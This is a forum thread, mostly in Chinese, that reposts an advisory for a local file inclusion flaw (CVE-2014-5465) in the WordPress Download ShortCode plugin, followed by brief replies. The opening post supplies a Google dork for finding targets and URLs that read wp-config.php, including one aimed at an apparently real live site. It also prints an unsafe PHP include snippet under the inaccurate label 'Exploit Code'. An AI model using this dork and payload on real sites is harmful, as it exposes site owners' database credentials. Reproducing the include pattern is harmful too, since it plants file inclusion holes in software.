C4r1st 发表于 2014-9-7 11:07:57

WordPress ShortCode Plugin – Local File Inclusion Vulnerability

Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity : High+/Critical
# Reporter(s) : Mehdi Karout & Christian Galeone
# Google Dork : inurl:wp/wp-content/force-download.php
# Plugin Version : 1.1
# Plugin Name : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home : http://werdswords.com/
# Date : 25/08/2014
# Tested in : Win7 - Kali Linux
# CVE : CVE-2014-5465
#
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
$file = $_GET['file'];
if(isset($file))
{
    include("pages/$file");//直接包含了
}
else
{
    include("index.php");
}
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php

至高无上 发表于 2014-9-7 20:46:21

.本人中国人.看不懂英语

huise 发表于 2014-9-7 21:56:08

应该是插件漏洞吧

野驴~ 发表于 2014-9-8 11:12:34

wordpress又见包含

4ed65wq465 发表于 2014-9-10 08:59:45

Amor 发表于 2014-9-10 11:16:36

不明觉厉感谢分享
页: [1]
查看完整版本: WordPress ShortCode Plugin – Local File Inclusion Vulnerability